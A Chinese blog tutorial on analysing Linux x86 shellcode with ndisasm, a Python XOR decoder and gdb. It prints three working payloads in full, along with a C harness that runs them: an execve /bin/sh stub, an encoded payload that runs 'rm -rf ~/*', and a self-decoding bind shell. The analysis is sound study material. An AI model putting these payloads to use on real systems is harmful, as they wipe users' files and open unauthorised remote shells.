wangxiaolong_china
wangxiaolong_china

Shellcode的分析调试技巧

转载请注明出处:http://blog.csdn.net/wangxiaolong_china

 

面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。

第一个shellcode代码如下:

 

static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";


 

使用ndisasm反汇编结果如下:

root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
00000000  EB17              jmp short 0x19
00000002  5E                 pop esi
00000003  897608           mov [esi+0x8],esi
00000006  31C0              xor eax,eax
00000008  884607           mov [esi+0x7],al
0000000B  89460C          mov [esi+0xc],eax
0000000E  B00B             mov al,0xb
00000010  89F3              mov ebx,esi
00000012  8D4E08          lea ecx,[esi+0x8]
00000015  31D2              xor edx,edx
00000017  CD80              int 0x80
00000019  E8E4FFFFFF    call dword 0x2
0000001E  2F                  das
0000001F  62696E            bound ebp,[ecx+0x6e]
00000022 2F                   das
00000023  7368               jnc 0x8d
00000025  58                  pop eax
root@linux:~/pentest#


 

可以看出,这是一个执行“/bin/sh”的shellcode。

第二个shellcode代码如下:

char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";


 

下面使用ndisasm反汇编,结果如下:

root@linux:~/pentest# echo -ne 
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
00000000  EB10              jmp short 0x12
00000002  5E                pop esi
00000003  31C9              xor ecx,ecx
00000005 B14B              mov cl,0x4b
00000007  B0FF              mov al,0xff
00000009  3006              xor [esi],al
0000000B  FEC8              dec al
0000000D  46                inc esi
0000000E  E2F9              loop 0x9
00000010  EB05              jmp short 0x17
00000012  E8EBFFFFFF        call dword 0x2
00000017 17                pop ss
00000018  DB                db 0xdb
00000019  FD                std
0000001A  FC                cld
0000001B  FB                sti
0000001C  D59B              aad 0x9b
0000001E  91                xchg eax,ecx
0000001F  99                cdq
00000020 D9869CF38199      fld dword [esi-0x667e0c64]
00000026  F0C28DED          lock ret 0xed8d
0000002A  9E                sahf
0000002B  86CA              xchg cl,dl
0000002D  C49A81C69BCB      les ebx,[edx-0x3464397f]
00000033  C9                leave
00000034  C2D3DE            ret 0xded3
00000037  F0BAB8AAF4B4      lock mov edx,0xb4f4aab8
0000003D  AC                lodsb
0000003E B4BB              mov ah,0xbb
00000040  D6                salc
00000041  88E5              mov ch,ah
00000043  13825C8DC19D      adc eax,[edx-0x623e72a4]
00000049  40                inc eax
0000004A  91                xchg eax,ecx
0000004B  C0994495CF954C    rcr byte [ecx-0x6a306abc],0x4c
00000052  2F                das
00000053  4A                dec edx
00000054  23F0              and esi,eax
00000056  120F              adc cl,[edi]
00000058  B570              mov ch,0x70
0000005A  3C32              cmp al,0x32
0000005C  7988              jns 0xffffffe6
0000005E  78F7              js 0x57
00000060  7B35              jpo 0x97
root@linux:~/pentest#


 

接下来,我们将使用一个python脚本和hexdump来分析这个shellcode。

root@linux:~/pentest# cat decode.py 
#!/usr/bin/env python
sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"  + \
      "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
      "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
      "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
      "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
      "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
      "\x7b\x35"
print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
root@linux:~/pentest# ./decode.py | hexdump -C
00000000  e8 25 00 00 00 2f 62 69  6e 2f 73 68 00 73 68 00   |.%.../bin/sh.sh.|
00000010  2d 63 00 72 6d 20 2d 72  66 20 7e 2f 2a 20 32 3e   |-c.rm -rf ~/* 2>|
00000020  2f 64 65 76 2f 6e 75 6c  6c 00 5d 31 c0 50 8d 5d   |/dev/null.]1.P.]|
00000030  0e 53 8d 5d 0b 53 8d 5d  08 53 89 eb 89 e1 31 d2  |.S.].S.].S....1.|
00000040  b0 0b cd 80 89 c3 31 c0  40 cd 80 0a                  |......1.@...|
0000004c
root@linux:~/pentest#


 

可以看到“/bin/sh”“sh”“rm –rf ~/* 2>/dev/null”几条指令,接下来我们使用ndisasm分析:

root@linux:~/pentest# ./decode.py | ndisasm -u -
00000000  E825000000        call dword 0x2a
00000005  2F                das
00000006  62696E            bound ebp,[ecx+0x6e]
00000009  2F                das
0000000A  7368              jnc 0x74
0000000C  007368            add [ebx+0x68],dh
0000000F  002D6300726D      add [dword 0x6d720063],ch
00000015  202D7266207E      and [dword 0x7e206672],ch
0000001B  2F                das
0000001C  2A20              sub ah,[eax]
0000001E  323E              xor bh,[esi]
00000020  2F                das
00000021  6465762F          gs jna 0x54
00000025  6E                outsb
00000026  756C              jnz 0x94
00000028  6C                insb
00000029 005D31            add [ebp+0x31],bl
0000002C  C0508D5D          rcl byte [eax-0x73],0x5d
00000030  0E                push cs
00000031  53                push ebx
00000032  8D5D0B            lea ebx,[ebp+0xb]
00000035  53                push ebx
00000036  8D5D08            lea ebx,[ebp+0x8]
00000039  53                push ebx
0000003A 89EB              mov ebx,ebp
0000003C  89E1              mov ecx,esp
0000003E  31D2              xor edx,edx
00000040  B00B              mov al,0xb
00000042  CD80              int 0x80
00000044  89C3              mov ebx,eax
00000046  31C0              xor eax,eax
00000048  40                inc eax
00000049 CD80              int 0x80
0000004B  0A                db 0x0a
root@linux:~/pentest#


 

开始几条指令可以改写为:

E825000000 call 0x2a
2F62696E2F736800 db "/bin/sh"
736800 db "sh"
2D6300 db "-c"
726d202D7266207E2F2A20323E2F6465762F6E756C6C00 db "rm -rf ~/* 2>/dev/null"
5D pop ebp


 

第一条指令为“call 0x2a”,接下来分析一下该指令调用的函数,即只保留0x2a(42)开始的指令的操作码。

root@linux:~/pentest# ./decode.py | cut -c 43- | ndisasm -u -
00000000  5D                pop ebp
00000001  31C0              xor eax,eax
00000003  50                push eax
00000004  8D5D0E            lea ebx,[ebp+0xe]
00000007  53                push ebx
00000008  8D5D0B            lea ebx,[ebp+0xb]
0000000B  53                push ebx
0000000C  8D5D08            lea ebx,[ebp+0x8]
0000000F  53                push ebx
00000010  89EB              mov ebx,ebp
00000012  89E1              mov ecx,esp
00000014  31D2              xor edx,edx
00000016  B00B              mov al,0xb
00000018  CD80              int 0x80
0000001A  89C3              mov ebx,eax
0000001C 31C0              xor eax,eax
0000001E  40                inc eax
0000001F  CD80              int 0x80
00000021  0A                db 0x0a
root@linux:~/pentest#


 

可以看到这是一个execve系统调用,它使用数组“sh”“-c”“rm –rf ~/* 2>/dev/null”作为第二个参数。

这样,该shellcode的功能已经一目了然了。

第三个shellcode代码如下:

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff".
           "\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff".
           "\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b".
           "\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83".
           "\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a".
           "\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58".
           "\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58".
           "\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9".
           "\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a".
           "\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62".
	       "\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb".
           "\xba\x01\xc7\x8a";


 

首先,使用perl输出这个shellcode,然后用ndisasm分析这个shellcode。

root@linux:~/pentest# cat shellcode.pl 
#!/usr/bin/perl

$shellcode = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff".
           "\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff".
           "\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b".
           "\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83".
           "\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a".
           "\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58".
           "\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58".
           "\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9".
           "\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a".
           "\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62".
	       "\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb".
           "\xba\x01\xc7\x8a";

open FILE,"> shellcode.bin";
print FILE $shellcode;

close FILE;
root@linux:~/pentest# ./shellcode.pl
root@linux:~/pentest# ndisasm -b32 shellcode.bin
00000000  EB11              jmp short 0x13
00000002  5E                pop esi
00000003  31C9              xor ecx,ecx
00000005  B165              mov cl,0x65
00000007  80740EFF0A        xor byte [esi+ecx-0x1],0xa
0000000C  80E901            sub cl,0x1
0000000F  75F6              jnz 0x7
00000011  EB05              jmp short 0x18
00000013  E8EAFFFFFF        call dword 0x2
00000018  3BCA              cmp ecx,edx
0000001A  3BD1              cmp edx,ecx
0000001C  3BD8              cmp ebx,eax
0000001E  5A                pop edx
0000001F  60                pushad
00000020  0B6008            or esp,[eax+0x8]
00000023  83EBF4            sub ebx,byte -0xc
00000026  C9                leave
00000027  BA6CC78A83        mov edx,0x838ac76c
0000002C  CC                int3
0000002D  58                pop eax
0000002E  62B108107083      bound esi,[ecx-0x7c8feff8]
00000034  EB60              jmp short 0x96
00000036  1A5B5C            sbb bl,[ebx+0x5c]
00000039  83EBF4            sub ebx,byte -0xc
0000003C  C9                leave
0000003D  BA6CC78A58        mov edx,0x588ac76c
00000042  5C                pop esp
00000043  83EBB9            sub ebx,byte -0x47
00000046  0E                push cs
00000047  BA6CC78A58        mov edx,0x588ac76c
0000004C  58                pop eax
0000004D  5C                pop esp
0000004E  83EBF4            sub ebx,byte -0xc
00000051  C9                leave
00000052  BA6CC78A83        mov edx,0x838ac76c
00000057  C9                leave
00000058  3BC3              cmp eax,ebx
0000005A  BA35C78A4B        mov edx,0x4b8ac735
0000005F  BA35C78A4B        mov edx,0x4b8ac735
00000064  BA35C78A58        mov edx,0x588ac735
00000069  622525796262      bound esp,[dword 0x62627925]
0000006F  2568636483        and eax,0x83646368
00000074  E9585983EB        jmp dword 0xeb8359d1
00000079  BA                db 0xba
0000007A  01C7              add edi,eax
0000007C  8A                db 0x8a
root@linux:~/pentest#


 

分析一段shellcode的功能,核心的是什么呢?我觉得最核心的是这段shellcode实现的系统调用,因为一旦知道shellcode实现的系统调用,那么整段shellcode的功能便已了然。要知道shellcode实现的系统调用,关键是找到系统调用号,即int 0x80执行之前,eax寄存器中存放的数字。

上面的代码反汇编中,并没有找到int 0x80的踪影。原因在哪里呢?仔细分析这段代码,前几行代码已经给了我们答案:

00000000  EB11              jmp short 0x13
00000002  5E                pop esi
00000003  31C9              xor ecx,ecx
00000005  B165              mov cl,0x65
00000007  80740EFF0A        xor byte [esi+ecx-0x1],0xa
0000000C  80E901            sub cl,0x1
0000000F  75F6              jnz 0x7
00000011  EB05              jmp short 0x18
00000013  E8EAFFFFFF        call dword 0x2
00000018  3BCA              cmp ecx,edx


 

这是一段自修改shellcode。运行后,它调用“xor byte [esi+ecx-0x1],0xa”这条指令,将0x00000018及以后的0x65个字节组成的指令进行译码,生成我们要用到的特定功能的shellcode。

接下来,我们要想知道这段shellcode的功能,就必须要动态的调试这段shellcode。于是我们构造了下面的C调用程序,编译,并用gdb动态的调试这段shellcode。

root@linux:~/pentest# cat shellcode.c
#include <stdio.h>
 
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff"
           "\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff"
           "\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b"
           "\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83"
           "\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a"
           "\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58"
           "\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58"
           "\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9"
           "\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a"
           "\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62"
           "\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb"
           "\xba\x01\xc7\x8a";
 
         
int main(void)
{
    (*(void(*)()) shellcode)();
}
root@linux:~/pentest# 

root@linux:~/pentest# gcc -fno-stack-protector -z execstack -g -o shellcode shellcode.c
root@linux:~/pentest# gdb shellcode
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/pentest/shellcode...done.
(gdb) disass main
Dump of assembler code for function main:
   0x08048394 <+0>:	push   %ebp
   0x08048395 <+1>:	mov    %esp,%ebp
   0x08048397 <+3>:	and    {1}xfffffff0,%esp
   0x0804839a <+6>:	mov    {1}x804a040,%eax
   0x0804839f <+11>:	call   *%eax
   0x080483a1 <+13>:	mov    %ebp,%esp
   0x080483a3 <+15>:	pop    %ebp
   0x080483a4 <+16>:	ret    
End of assembler dump.
(gdb) disass 0x804a040
Dump of assembler code for function shellcode:
   0x0804a040 <+0>:	jmp    0x804a053 <shellcode+19>
   0x0804a042 <+2>:	pop    %esi
   0x0804a043 <+3>:	xor    %ecx,%ecx
   0x0804a045 <+5>:	mov    {1}x65,%cl
   0x0804a047 <+7>:	xorb   {1}xa,-0x1(%esi,%ecx,1)
   0x0804a04c <+12>:	sub    {1}x1,%cl
   0x0804a04f <+15>:	jne    0x804a047 <shellcode+7>
   0x0804a051 <+17>:	jmp    0x804a058 <shellcode+24>
   0x0804a053 <+19>:	call   0x804a042 <shellcode+2>
   0x0804a058 <+24>:	cmp    %edx,%ecx
   0x0804a05a <+26>:	cmp    %ecx,%edx
   0x0804a05c <+28>:	cmp    %eax,%ebx
   0x0804a05e <+30>:	pop    %edx
   0x0804a05f <+31>:	pusha  
   0x0804a060 <+32>:	or     0x8(%eax),%esp
   0x0804a063 <+35>:	sub    {1}xfffffff4,%ebx
   0x0804a066 <+38>:	leave  
   0x0804a067 <+39>:	mov    {1}x838ac76c,%edx
   0x0804a06c <+44>:	int3   
   0x0804a06d <+45>:	pop    %eax
   0x0804a06e <+46>:	bound  %esi,-0x7c8feff8(%ecx)
   0x0804a074 <+52>:	jmp    0x804a0d6
---Type <return> to continue, or q <return> to quit---
   0x0804a076 <+54>:	sbb    0x5c(%ebx),%bl
   0x0804a079 <+57>:	sub    {1}xfffffff4,%ebx
   0x0804a07c <+60>:	leave  
   0x0804a07d <+61>:	mov    {1}x588ac76c,%edx
   0x0804a082 <+66>:	pop    %esp
   0x0804a083 <+67>:	sub    {1}xffffffb9,%ebx
   0x0804a086 <+70>:	push   %cs
   0x0804a087 <+71>:	mov    {1}x588ac76c,%edx
   0x0804a08c <+76>:	pop    %eax
   0x0804a08d <+77>:	pop    %esp
   0x0804a08e <+78>:	sub    {1}xfffffff4,%ebx
   0x0804a091 <+81>:	leave  
   0x0804a092 <+82>:	mov    {1}x838ac76c,%edx
   0x0804a097 <+87>:	leave  
   0x0804a098 <+88>:	cmp    %ebx,%eax
   0x0804a09a <+90>:	mov    {1}x4b8ac735,%edx
   0x0804a09f <+95>:	mov    {1}x4b8ac735,%edx
   0x0804a0a4 <+100>:	mov    {1}x588ac735,%edx
   0x0804a0a9 <+105>:	bound  %esp,0x62627925
   0x0804a0af <+111>:	and    {1}x83646368,%eax
   0x0804a0b4 <+116>:	jmp    0xf387fa11
   0x0804a0b9 <+121>:	mov    {1}x8ac701,%edx
End of assembler dump.


 

设置断点,并调试这段代码:

(gdb) disass main
Dump of assembler code for function main:
   0x08048394 <+0>:	push   %ebp
   0x08048395 <+1>:	mov    %esp,%ebp
   0x08048397 <+3>:	and    {1}xfffffff0,%esp
   0x0804839a <+6>:	mov    {1}x804a040,%eax
   0x0804839f <+11>:	call   *%eax
   0x080483a1 <+13>:	mov    %ebp,%esp
   0x080483a3 <+15>:	pop    %ebp
   0x080483a4 <+16>:	ret    
End of assembler dump.
(gdb) b *main+16
Breakpoint 2 at 0x80483a4: file shellcode.c, line 20.
(gdb) r
Starting program: /root/pentest/shellcode 
^C
Program received signal SIGINT, Interrupt.
0x0804a096 in shellcode ()
(gdb) i r eip
eip            0x804a096	0x804a096 <shellcode+86>
(gdb) disass 0x804a096
Dump of assembler code for function shellcode:
   0x0804a040 <+0>:	jmp    0x804a053 <shellcode+19>
   0x0804a042 <+2>:	pop    %esi
   0x0804a043 <+3>:	xor    %ecx,%ecx
   0x0804a045 <+5>:	mov    {1}x65,%cl
   0x0804a047 <+7>:	xorb   {1}xa,-0x1(%esi,%ecx,1)
   0x0804a04c <+12>:	sub    {1}x1,%cl
   0x0804a04f <+15>:	jne    0x804a047 <shellcode+7>
   0x0804a051 <+17>:	jmp    0x804a058 <shellcode+24>
   0x0804a053 <+19>:	call   0x804a042 <shellcode+2>
   0x0804a058 <+24>:	xor    %eax,%eax
   0x0804a05a <+26>:	xor    %ebx,%ebx
   0x0804a05c <+28>:	xor    %edx,%edx
   0x0804a05e <+30>:	push   %eax
   0x0804a05f <+31>:	push   {1}x1
   0x0804a061 <+33>:	push   {1}x2
   0x0804a063 <+35>:	mov    %esp,%ecx
   0x0804a065 <+37>:	inc    %bl
   0x0804a067 <+39>:	mov    {1}x66,%al
   0x0804a069 <+41>:	int    {1}x80
   0x0804a06b <+43>:	mov    %eax,%esi
   0x0804a06d <+45>:	push   %edx
   0x0804a06e <+46>:	push   {1}x7a1a02bb
---Type <return> to continue, or q <return> to quit---
   0x0804a073 <+51>:	mov    %esp,%ecx
   0x0804a075 <+53>:	push   {1}x10
   0x0804a077 <+55>:	push   %ecx
   0x0804a078 <+56>:	push   %esi
   0x0804a079 <+57>:	mov    %esp,%ecx
   0x0804a07b <+59>:	inc    %bl
   0x0804a07d <+61>:	mov    {1}x66,%al
   0x0804a07f <+63>:	int    {1}x80
   0x0804a081 <+65>:	push   %edx
   0x0804a082 <+66>:	push   %esi
   0x0804a083 <+67>:	mov    %esp,%ecx
   0x0804a085 <+69>:	mov    {1}x4,%bl
   0x0804a087 <+71>:	mov    {1}x66,%al
   0x0804a089 <+73>:	int    {1}x80
   0x0804a08b <+75>:	push   %edx
   0x0804a08c <+76>:	push   %edx
   0x0804a08d <+77>:	push   %esi
   0x0804a08e <+78>:	mov    %esp,%ecx
   0x0804a090 <+80>:	inc    %bl
   0x0804a092 <+82>:	mov    {1}x66,%al
   0x0804a094 <+84>:	int    {1}x80
=> 0x0804a096 <+86>:	mov    %eax,%ebx
   0x0804a098 <+88>:	xor    %ecx,%ecx
---Type <return> to continue, or q <return> to quit---
   0x0804a09a <+90>:	mov    {1}x3f,%al
   0x0804a09c <+92>:	int    {1}x80
   0x0804a09e <+94>:	inc    %ecx
   0x0804a09f <+95>:	mov    {1}x3f,%al
   0x0804a0a1 <+97>:	int    {1}x80
   0x0804a0a3 <+99>:	inc    %ecx
   0x0804a0a4 <+100>:	mov    {1}x3f,%al
   0x0804a0a6 <+102>:	int    {1}x80
   0x0804a0a8 <+104>:	push   %edx
   0x0804a0a9 <+105>:	push   {1}x68732f2f
   0x0804a0ae <+110>:	push   {1}x6e69622f
   0x0804a0b3 <+115>:	mov    %esp,%ebx
   0x0804a0b5 <+117>:	push   %edx
   0x0804a0b6 <+118>:	push   %ebx
   0x0804a0b7 <+119>:	mov    %esp,%ecx
   0x0804a0b9 <+121>:	mov    {1}xb,%al
   0x0804a0bb <+123>:	int    {1}x80
   0x0804a0bd <+125>:	add    %al,(%eax)
End of assembler dump.
(gdb)


 

到这里,我们想要的int 0x80出现了。

系统调用号$0x66对应的是__NR_socketcall,看来是个socket函数。具体的要和功能号相关联查了下应该是socket->bind->listen->accept->dup2->execve。恩,很明显的一个bindshell!

 

你可能感兴趣的:(c,linux,function,汇编,byte,X86)

  • 机器学习与深度学习间关系与区别 ℒℴѵℯ心·动ꦿ໊ོ꫞ 人工智能学习深度学习python
    一、机器学习概述定义机器学习(MachineLearning,ML)是一种通过数据驱动的方法,利用统计学和计算算法来训练模型,使计算机能够从数据中学习并自动进行预测或决策。机器学习通过分析大量数据样本,识别其中的模式和规律,从而对新的数据进行判断。其核心在于通过训练过程,让模型不断优化和提升其预测准确性。主要类型1.监督学习(SupervisedLearning)监督学习是指在训练数据集中包含输入
  • android系统selinux中添加新属性property 辉色投像
    1.定位/android/system/sepolicy/private/property_contexts声明属性开头:persist.charge声明属性类型:u:object_r:system_prop:s0图12.定位到android/system/sepolicy/public/domain.te删除neverallow{domain-init}default_prop:property
  • 【iOS】MVC设计模式 Magnetic_h iosmvc设计模式objective-c学习ui
    MVC前言如何设计一个程序的结构,这是一门专门的学问,叫做"架构模式"(architecturalpattern),属于编程的方法论。MVC模式就是架构模式的一种。它是Apple官方推荐的App开发架构,也是一般开发者最先遇到、最经典的架构。MVC各层controller层Controller/ViewController/VC(控制器)负责协调Model和View,处理大部分逻辑它将数据从Mod
  • OC语言多界面传值五大方式 Magnetic_h iosui学习objective-c开发语言
    前言在完成暑假仿写项目时,遇到了许多需要用到多界面传值的地方,这篇博客来总结一下比较常用的五种多界面传值的方式。属性传值属性传值一般用前一个界面向后一个界面传值,简单地说就是通过访问后一个视图控制器的属性来为它赋值,通过这个属性来做到从前一个界面向后一个界面传值。首先在后一个界面中定义属性@interfaceBViewController:UIViewController@propertyNSSt
  • UI学习——cell的复用和自定义cell Magnetic_h ui学习
    目录cell的复用手动(非注册)自动(注册)自定义cellcell的复用在iOS开发中,单元格复用是一种提高表格(UITableView)和集合视图(UICollectionView)滚动性能的技术。当一个UITableViewCell或UICollectionViewCell首次需要显示时,如果没有可复用的单元格,则视图会创建一个新的单元格。一旦这个单元格滚动出屏幕,它就不会被销毁。相反,它被添
  • element实现动态路由+面包屑 软件技术NINI vue案例vue.js前端
    el-breadcrumb是ElementUI组件库中的一个面包屑导航组件,它用于显示当前页面的路径,帮助用户快速理解和导航到应用的各个部分。在Vue.js项目中,如果你已经安装了ElementUI,就可以很方便地使用el-breadcrumb组件。以下是一个基本的使用示例:安装ElementUI(如果你还没有安装的话):你可以通过npm或yarn来安装ElementUI。bash复制代码npmi
  • C语言宏函数 南林yan C语言c语言
    一、什么是宏函数?通过宏定义的函数是宏函数。如下,编译器在预处理阶段会将Add(x,y)替换为((x)*(y))#defineAdd(x,y)((x)*(y))#defineAdd(x,y)((x)*(y))intmain(){inta=10;intb=20;intd=10;intc=Add(a+d,b)*2;cout<
  • C语言如何定义宏函数? 小九格物 c语言
    在C语言中,宏函数是通过预处理器定义的,它在编译之前替换代码中的宏调用。宏函数可以模拟函数的行为,但它们不是真正的函数,因为它们在编译时不会进行类型检查,也不会分配存储空间。宏函数的定义通常使用#define指令,后面跟着宏的名称和参数列表,以及宏展开后的代码。宏函数的定义方式:1.基本宏函数:这是最简单的宏函数形式,它直接定义一个表达式。#defineSQUARE(x)((x)*(x))2.带参
  • 理解Gunicorn:Python WSGI服务器的基石 范范0825 ipythonlinux运维
    理解Gunicorn:PythonWSGI服务器的基石介绍Gunicorn,全称GreenUnicorn,是一个为PythonWSGI(WebServerGatewayInterface)应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具,Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置,帮助初学者快速上手。1.什么是Gunico
  • Cell Insight | 单细胞测序技术又一新发现,可用于HIV-1和Mtb共感染个体诊断 尐尐呅
    结核病是艾滋病合并其他疾病中导致患者死亡的主要原因。其中结核病由结核分枝杆菌(Mycobacteriumtuberculosis,Mtb)感染引起,获得性免疫缺陷综合症(艾滋病)由人免疫缺陷病毒(Humanimmunodeficiencyvirustype1,HIV-1)感染引起。国家感染性疾病临床医学研究中心/深圳市第三人民医院张国良团队携手深圳华大生命科学研究院吴靓团队,共同研究得出单细胞测序
  • c++ 的iostream 和 c++的stdio的区别和联系 黄卷青灯77 c++算法开发语言iostreamstdio
    在C++中,iostream和C语言的stdio.h都是用于处理输入输出的库,但它们在设计、用法和功能上有许多不同。以下是两者的区别和联系:区别1.编程风格iostream(C++风格):C++标准库中的输入输出流类库,支持面向对象的输入输出操作。典型用法是cin(输入)和cout(输出),使用>操作符来处理数据。更加类型安全,支持用户自定义类型的输入输出。#includeintmain(){in
  • Long类型前后端数据不一致 igotyback 前端
    响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题,尤其是当后端使用Java的Long类型(64位)与前端JavaScript的Number类型(最大安全整数为2^53-1,即16位)进行数据交互时,很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
  • LocalDateTime 转 String igotyback java开发语言
    importjava.time.LocalDateTime;importjava.time.format.DateTimeFormatter;publicclassMain{publicstaticvoidmain(String[]args){//获取当前时间LocalDateTimenow=LocalDateTime.now();//定义日期格式化器DateTimeFormatterformat
  • swagger访问路径 igotyback swagger
    Swagger2.x版本访问地址:http://{ip}:{port}/{context-path}/swagger-ui.html{ip}是你的服务器IP地址。{port}是你的应用服务端口,通常为8080。{context-path}是你的应用上下文路径,如果应用部署在根路径下,则为空。Swagger3.x版本对于Swagger3.x版本(也称为OpenAPI3)访问地址:http://{ip
  • mysql禁用远程登录 igotyback mysql
    去mysql库中的user表里,将host都改成localhost之后刷新权限FLUSHPRIVILEGES;
  • Linux下QT开发的动态库界面弹出操作(SDL2) 13jjyao QT类qt开发语言sdl2linux
    需求:操作系统为linux,开发框架为qt,做成需带界面的qt动态库,调用方为java等非qt程序难点:调用方为java等非qt程序,也就是说调用方肯定不带QApplication::exec(),缺少了这个,QTimer等事件和QT创建的窗口将不能弹出(包括opencv也是不能弹出);这与qt调用本身qt库是有本质的区别的思路:1.调用方缺QApplication::exec(),那么我们在接口
  • 店群合一模式下的社区团购新发展——结合链动 2+1 模式、AI 智能名片与 S2B2C 商城小程序源码 说私域 人工智能小程序
    摘要:本文探讨了店群合一的社区团购平台在当今商业环境中的重要性和优势。通过分析店群合一模式如何将互联网社群与线下终端紧密结合,阐述了链动2+1模式、AI智能名片和S2B2C商城小程序源码在这一模式中的应用价值。这些创新元素的结合为社区团购带来了新的机遇,提升了用户信任感、拓展了营销渠道,并实现了线上线下的完美融合。一、引言随着互联网技术的不断发展,社区团购作为一种新兴的商业模式,在满足消费者日常需
  • html 中如何使用 uniapp 的部分方法 某公司摸鱼前端 htmluni-app前端
    示例代码:Documentconsole.log(window);效果展示:好了,现在就可以uni.使用相关的方法了
  • ArcGIS栅格计算器常见公式(赋值、0和空值的转换、补充栅格空值) 研学随笔 arcgis经验分享
